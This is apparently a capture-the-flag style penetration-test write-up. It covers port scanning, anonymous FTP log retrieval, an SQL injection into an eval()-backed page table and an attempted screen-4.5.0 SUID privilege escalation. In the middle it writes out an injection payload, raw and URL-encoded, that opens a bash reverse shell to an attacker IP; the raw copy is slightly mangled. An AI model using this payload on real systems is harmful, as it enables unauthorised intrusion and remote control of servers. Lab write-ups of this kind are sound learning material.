$ nmap -p- --min-rate 3000 -Pn 192.168.157.162
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 14:41 +08
Nmap scan report for 192.168.157.162
Host is up (0.18s latency).
Not shown: 65483 filtered tcp ports (no-response), 47 filtered tcp ports (host-unreach)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
9090/tcp closed zeus-admin
Quite a few ports open.
FTP -> access.log
We can check whether FTP accepts anonymous logins, which it does!
$ ftp 192.168.157.162
Connected to 192.168.157.162.
220 (vsFTPd 3.0.3)
Name (192.168.157.162:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32481|)
ftp: Can't connect to `192.168.157.162:32481': No route to host
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 54 Aug 27 2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 501 20 955 Aug 27 2021 access.log
-rw-r--r-- 1 501 20 530 Aug 27 2021 auth.log
-rw-r--r-- 1 501 20 176 Aug 27 2021 syslog
We can download the log files and view them. access.log reveals a hidden file on one of the web applications:
We can see that there's an SQL Injection within the get_page function. The redirect_url is taken as the $route_string variable. If we attempt basic injection, it redirects us to phpinfo.php:
Within this, we can see that there are no disabled functions, and that the document root is at /var/www/html:
I attempted to write some files, but it fails:
So writing webshells won't work. When I looked at the code again, I saw that it was using eval() after the get_page function returns. This means that if we can somehow make the function return PHP code, it would be executed in eval().
We know that the database is called webpages, and that there are 2 columns in it called page_data and route_string. Using this knowledge, let's try INSERT INTO to get RCE.
I tried creating a new directory with one PHP payload on it:
";INSERT INTO webpages(route_string, page_data) VALUES ('/rev', 'echo shell_exec("bash -i >& /dev/tcp/192.168.45.227/800>&1");'); --## after URL encoding%22%3BINSERT%20INTO%20webpages%28route_string%2C%20page_data%29%20VALUES%20%28%27%2Frev%27%2C%20%27echo%20shell_exec%28%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.227%2F80%200%3E%261%22%29%3B%27%29%3B%20--
Then visit index.php with that payload and visit /rev.
We can run bash linpeas.sh to enumerate for us. It didn't reveal anything obvious besides this SUID binary:
-rwsr-xr-x. 1 root root 1.7M Aug 27 2021 /usr/bin/screen-4.5.0
This version of screen is exploitable:
However, when we run the exploit in /dev/shm and /tmp, it doesn't work:
bash: /dev/shm/rootshell: Permission denied
bash-4.4$ ls -la /dev/shm
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/dev/shm/libhax.so' from /etc/ld.so.preload cannot be preloaded (failed to map segment from shared object): ignored.
total 32
drwxrwxrwt 2 root root 80 Jul 14 03:38 .
drwxr-xr-x 19 root root 3020 Jul 14 03:33 ..
-rwxrwxrwx 1 apache apache 15528 Jul 14 03:38 libhax.so
-rwxrwxrwx 1 apache apache 16168 Jul 14 03:37 rootshell
We are being denied permission despite the permissions being correct and doing the exploit correctly. I googled the problem and found this:
So as I learned, directories themselves have capabilities, and nosuid can be one of them preventing us from running setuid functions even if we have the right exploit. We can find other writeable directories: